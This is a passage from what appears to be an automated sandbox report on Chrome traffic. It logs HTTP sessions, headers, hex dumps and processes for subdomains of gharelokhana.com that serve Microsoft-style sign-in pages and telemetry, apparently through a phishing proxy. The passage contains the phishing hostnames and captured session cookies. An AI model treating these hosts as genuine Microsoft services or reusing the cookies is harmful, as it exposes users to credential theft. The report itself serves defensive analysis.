                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0; ai_session=eVjvSUwhrTpFe3TgKPxN7t|1733383468678|1733383468678
                                                2024-12-05 07:24:34 UTC863INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:34 GMT
                                                Content-Type: application/json; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: no-store, no-cache
                                                pragma: no-cache
                                                access-control-allow-origin: https://8cacc656-3c4125ca.gharelokhana.com/
                                                access-control-allow-credentials: true
                                                access-control-allow-methods: POST, OPTIONS
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: 420d7caf-a335-42b5-a92d-4c03f0486900
                                                x-ms-ests-server: 2.1.19568.3 - FRC ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                2024-12-05 07:24:34 UTC170INData Raw: 61 34 0d 0a 7b 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 36 31 30 30 2c 22 73 74 73 45 72 72 6f 72 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 34 38 36 61 64 38 62 39 2d 30 64 61 66 2d 34 30 65 33 2d 38 37 66 31 2d 64 65 37 31 63 61 38 64 37 36 39 63 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 35 20 30 37 3a 32 34 3a 33 34 5a 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 7d 7d 0d 0a
                                                Data Ascii: a4{"error":{"code":6100,"stsError":"AADSTS900561","correlationId":"486ad8b9-0daf-40e3-87f1-de71ca8d769c","timestamp":"2024-12-05 07:24:34Z","message":"AADSTS900561"}}
                                                2024-12-05 07:24:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                48192.168.2.549942164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:33 UTC707OUTOPTIONS /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/1.1
                                                Host: b1a4e5aa-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                Accept: */*
                                                Access-Control-Request-Method: POST
                                                Access-Control-Request-Headers: apikey,cache-control,client-id,client-version,content-type,time-delta-to-apply-millis,upload-time
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Dest: empty
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:24:34 UTC632INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:34 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: public, 3600
                                                access-control-allow-credentials: true
                                                access-control-allow-headers: AuthMsaDeviceTicket,AuthXToken,Content-Encoding,Content-Type,Cache-Control,Client-Id,SDK-Name,sdk-version,apikey,x-apikey,client-version,upload-time,time-delta-to-apply-millis,client-time-epoch-millis,persistence-mode,reliability-mode,NoResponseBody
                                                access-control-max-age: 3600
                                                access-control-allow-origin: https://djdjkdlellekkff.gharelokhana.com
                                                2024-12-05 07:24:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                49192.168.2.549944164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:33 UTC554OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:34 UTC800INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:34 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:49 GMT
                                                etag: 0x8DB5C3F49ED96E0
                                                x-ms-request-id: 48635b47-101e-0074-558c-46c80b000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072434Z-15d6f6465c8r6bl7hC1DUSwb3w00000001cg00000000uems
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:34 UTC628INData Raw: 32 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b
                                                Data Ascii: 26d}UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;
                                                2024-12-05 07:24:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                50192.168.2.549945164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:33 UTC575OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:34 UTC806INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:34 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 35203
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Thu, 15 Aug 2024 17:52:55 GMT
                                                etag: 0x8DCBD5317AEB807
                                                x-ms-request-id: 4c87aaa3-601e-0051-58d0-446177000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072434Z-15b54885d96pvbqdhC1FRApzxc00000007rg00000000pmpz
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:34 UTC15578INData Raw: 1f 8b 08 00 00 00 00 00 00 03 c4 bd 6b 43 db 48 b2 30 fc fd f9 15 e0 9d 65 ac b5 00 df 30 18 70 58 06 92 49 76 33 93 9c 5c 66 cf 2e 30 59 59 96 6d 0d b2 65 24 99 4b 02 cf 6f 7f eb d2 97 6a c9 90 cc 9c 67 df 33 e7 6c 70 57 df aa ab ab ab ab aa ab 5b db 7f 59 ff 3f 6b 7f 59 db fc f6 ff d6 de 7f 38 7e f7 61 ed cd 8b b5 0f 2f 5f bd 3b 5d 7b 0b a9 7f ae fd fc e6 c3 ab 93 e7 df de 0e 76 8a ff fb 30 8d f3 b5 71 9c 44 6b f0 77 18 e4 d1 68 2d 9d af a5 d9 5a 3c 0f d3 6c 91 66 41 11 e5 6b 33 f8 37 8b 83 64 6d 9c a5 b3 b5 62 1a ad 2d b2 f4 b7 28 2c f2 b5 24 ce 0b a8 34 8c 92 f4 66 ad 0e cd 65 a3 b5 b7 41 56 dc ad bd 7a eb 6d 41 fb 11 b4 16 4f e2 39 d4 0e d3 c5 1d fc 9e 16 6b f3 b4 88 c3 68 2d 98 8f a8 b5 04 12 f3 3c 5a 5b ce 47 51 b6 76 33 8d c3 e9 da 4f 71 98 a5 79
                                                Data Ascii: kCH0e0pXIv3\f.0YYme$Kojg3lpW[Y?kY8~a/_;]{v0qDkwh-Z<lfAk37dmb-(,$4feAVzmAO9kh-<Z[GQv3Oqy
                                                2024-12-05 07:24:35 UTC16384INData Raw: 5a 27 f8 ef 29 66 ec 36 5f c0 bf 7b cf db e7 cb d6 5e f3 39 39 c4 7e d8 a4 3f 2f f0 df f6 31 25 da 94 d3 6b 52 82 1f fb eb f5 38 01 c5 5e 3c 7f 81 ff be 78 d1 df a4 3f 3f 5c dc 9f 2f 4f c1 50 38 83 3f 27 3f 9c e2 bf 27 a7 0c 6c bf 20 e0 31 36 05 7f 3a 0c ed 50 d1 d3 dd ce 26 fd 39 26 e8 0f dd 26 95 6d b6 f0 df 36 d7 d8 7d 71 b1 4d a3 6e 7f 8d a8 34 0f af e3 f9 e5 eb 60 18 25 4c c7 0e 12 cf 64 9c 46 79 11 cf e9 d1 06 ce ee 3a d9 1f e2 22 89 38 63 87 29 dd f9 fd 86 81 f5 0f 1a c3 1d f7 a8 90 94 f1 fc a7 e0 16 94 3d fa 49 a2 98 7e 0d d0 42 9f 0f 5a 07 94 3a 0c 0f 88 0d fb 1d 90 fd a0 60 00 7b 67 a1 94 ab 54 0a b7 32 f4 1e 6e 6e ce bd 2f b8 bd 2b 09 06 15 63 6e 1f 58 7c 36 02 99 80 ef 21 6c e5 97 f1 e2 43 7a 19 e1 72 f3 fb b8 db a5 1e 15 1d 70 e1 cd 96 37 6f
                                                Data Ascii: Z')f6_{^99~?/1%kR8^<x??\/OP8?'?'l 16:P&9&&m6}qMn4`%LdFy:"8c)=I~BZ:`{gT2nn/+cnX|6!lCzrp7o
                                                2024-12-05 07:24:35 UTC3241INData Raw: 59 50 f0 c5 45 b8 81 8f 97 9d 57 e6 2c 3f 78 bc f7 20 e2 a8 a2 df 7e 03 2a 91 84 1f 96 70 ba 3a 2c ab a4 7b dd cf a3 b6 01 05 ad c2 c6 b1 cd 18 49 39 47 52 d1 7e bd ed 61 ce 6b 7f 6b 3a 3d 59 77 fb f5 b4 c4 a3 4a e9 38 f3 0c 15 0f 1a 0a c4 5f 82 27 30 3d c0 d9 50 e6 77 6b d3 79 54 78 e4 65 d8 22 43 6a b2 7f 23 cb dd 9d 8c 63 ba 01 cd 5d 64 d1 ca 3b 3b 5d 06 7c e3 2e bf 1e 05 7b 43 76 b8 79 cb 1e 85 f7 8e 36 3b 1c ba 31 1b 32 f5 fa 09 bd 4e ac 47 53 9a 28 e2 62 49 d1 1b bd 1f 7b 65 75 b8 a2 0a 08 ca 54 55 71 8e b6 d5 f8 4b b5 75 6d d4 9b d5 5a 95 a9 27 84 f0 46 ad dd 64 e1 8d 7a b9 dc c4 70 7a 19 3e 37 d8 ef 05 de 09 e0 57 2d 16 c2 32 97 29 63 0b fd 3a a9 eb 15 11 7a 8d 62 aa 7a 98 54 af 34 29 48 af b7 55 b4 3d 64 f5 74 1d 6d b6 e8 2a fb 97 d0 9a 41 06 e1
                                                Data Ascii: YPEW,?x ~*p:,{I9GR~akk:=YwJ8_'0=PwkyTxe"Cj#c]d;;]|.{Cvy6;12NGS(bI{euTUqKumZ'Fdzpz>7W-2)c:zbzT4)HU=dtm*A


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                51192.168.2.549951164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:35 UTC1098OUTPOST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/1.1
                                                Host: b1a4e5aa-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                Content-Length: 1723
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                upload-time: 1733383470755
                                                sec-ch-ua-mobile: ?0
                                                client-version: 1DS-Web-JS-3.2.6
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                time-delta-to-apply-millis: use-collector-delta
                                                content-type: application/x-json-stream
                                                cache-control: no-cache, no-store
                                                apikey: b0c252808e614e949086e019ae1cb300-e0c02060-e3b3-4965-bd7c-415e1a7a9fde-6951
                                                Client-Id: NO_AUTH
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:35 UTC1723OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 49 44 55 58 5f 45 53 54 53 43 6c 69 65 6e 74 54 65 6c 65 6d 65 74 72 79 45 76 65 6e 74 5f 57 65 62 57 61 74 73 6f 6e 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 30 35 54 30 37 3a 32 34 3a 32 38 2e 36 37 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 62 30 63 32 35 32 38 30 38 65 36 31 34 65 39 34 39 30 38 36 65 30 31 39 61 65 31 63 62 33 30 30 22 2c 22 65 78 74 22 3a 7b 22 61 70 70 22 3a 7b 22 76 65 72 22 3a 22 32 2e 31 2e 31 39 35 36 38 2e 33 22 2c 22 6e 61 6d 65 22 3a 22 49 44 55 58 5f 45 53 54 53 43 6c 69 65 6e 74 54 65 6c 65 6d 65 74 72 79 45 76 65 6e 74 5f 57 65 62 57 61 74 73 6f 6e 22 2c 22 73 65 73 49 64 22 3a 22 65 56 6a 76 53 55 77 68 72 54 70 46 65 33 54 67 4b 50 78 4e 37 74 22
                                                Data Ascii: {"name":"IDUX_ESTSClientTelemetryEvent_WebWatson","time":"2024-12-05T07:24:28.673Z","ver":"4.0","iKey":"o:b0c252808e614e949086e019ae1cb300","ext":{"app":{"ver":"2.1.19568.3","name":"IDUX_ESTSClientTelemetryEvent_WebWatson","sesId":"eVjvSUwhrTpFe3TgKPxN7t"
                                                2024-12-05 07:24:36 UTC884INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:36 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                time-delta-millis: 5588
                                                access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
                                                access-control-allow-methods: POST
                                                access-control-allow-credentials: true
                                                access-control-allow-origin: https://djdjkdlellekkff.gharelokhana.com
                                                access-control-expose-headers: time-delta-millis
                                                set-cookie: MC1="GUID=87833f2b95ed4eb9b18f2f5ccb3507b7&HASH=8783&LV=202412&V=4&LU=1733383476343"; Domain=gharelokhana.com; expires=Fri, 08 Nov 2080 14:49:12 GMT; Path=/; Secure
                                                set-cookie: MS0=2bfcefb984a14c6b991806c27d85da69; Domain=gharelokhana.com; expires=Thu, 09 Nov 2079 15:19:12 GMT; Path=/; Secure
                                                2024-12-05 07:24:36 UTC159INData Raw: 39 39 0d 0a 7b 22 61 63 63 22 3a 31 2c 22 77 65 62 52 65 73 75 6c 74 22 3a 7b 22 6d 73 66 70 63 22 3a 22 47 55 49 44 3d 38 37 38 33 33 66 32 62 39 35 65 64 34 65 62 39 62 31 38 66 32 66 35 63 63 62 33 35 30 37 62 37 26 48 41 53 48 3d 38 37 38 33 26 4c 56 3d 32 30 32 34 31 32 26 56 3d 34 26 4c 55 3d 31 37 33 33 33 38 33 34 37 36 33 34 33 22 2c 22 6d 63 31 22 3a 22 38 37 38 33 33 66 32 62 39 35 65 64 34 65 62 39 62 31 38 66 32 66 35 63 63 62 33 35 30 37 62 37 22 7d 7d 0d 0a
                                                Data Ascii: 99{"acc":1,"webResult":{"msfpc":"GUID=87833f2b95ed4eb9b18f2f5ccb3507b7&HASH=8783&LV=202412&V=4&LU=1733383476343","mc1":"87833f2b95ed4eb9b18f2f5ccb3507b7"}}
                                                2024-12-05 07:24:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                52192.168.2.549952164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:36 UTC871OUTGET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0; ai_session=eVjvSUwhrTpFe3TgKPxN7t|1733383468678|1733383468678
                                                Sec-WebSocket-Key: PyaJBLQVr+qsgncEF8gNKw==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-12-05 07:24:37 UTC743INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:37 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: private
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: d0432388-0ecd-41f7-9c9c-d432494e8100
                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                53192.168.2.549958164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:38 UTC671OUTGET /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/1.1
                                                Host: b1a4e5aa-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; MC1="GUID=87833f2b95ed4eb9b18f2f5ccb3507b7&HASH=8783&LV=202412&V=4&LU=1733383476343"; MS0=2bfcefb984a14c6b991806c27d85da69
                                                2024-12-05 07:24:39 UTC267INHTTP/1.1 405 Method Not Allowed
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:38 GMT
                                                Content-Type: application/json; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                allow: OPTIONS,POST
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:39 UTC78INData Raw: 34 38 0d 0a 7b 22 4d 65 73 73 61 67 65 22 3a 22 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 68 74 74 70 20 6d 65 74 68 6f 64 20 27 47 45 54 27 2e 22 7d 0d 0a
                                                Data Ascii: 48{"Message":"The requested resource does not support http method 'GET'."}
                                                2024-12-05 07:24:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                54192.168.2.549980164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:46 UTC1081OUTGET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0; ai_session=eVjvSUwhrTpFe3TgKPxN7t|1733383468678|1733383468678; MC1="GUID=87833f2b95ed4eb9b18f2f5ccb3507b7&HASH=8783&LV=202412&V=4&LU=1733383476343"; MS0=2bfcefb984a14c6b991806c27d85da69; MSFPC=GUID=87833f2b95ed4eb9b18f2f5ccb3507b7&HASH=8783&LV=202412&V=4&LU=1733383476343
                                                Sec-WebSocket-Key: Fz/IsdVu3LAgy+i40dmOEA==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-12-05 07:24:47 UTC740INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:47 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: private
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: 9e6b77ee-f371-4bab-aca6-17ae95b92f01
                                                x-ms-ests-server: 2.1.19568.3 - SEC ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:02:23:17
                                                Start date:05/12/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                Imagebase:0x7ff715980000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:2
                                                Start time:02:23:24
                                                Start date:05/12/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,5425962361269562764,13963646821391754707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                Imagebase:0x7ff715980000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:4
                                                Start time:02:23:31
                                                Start date:05/12/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
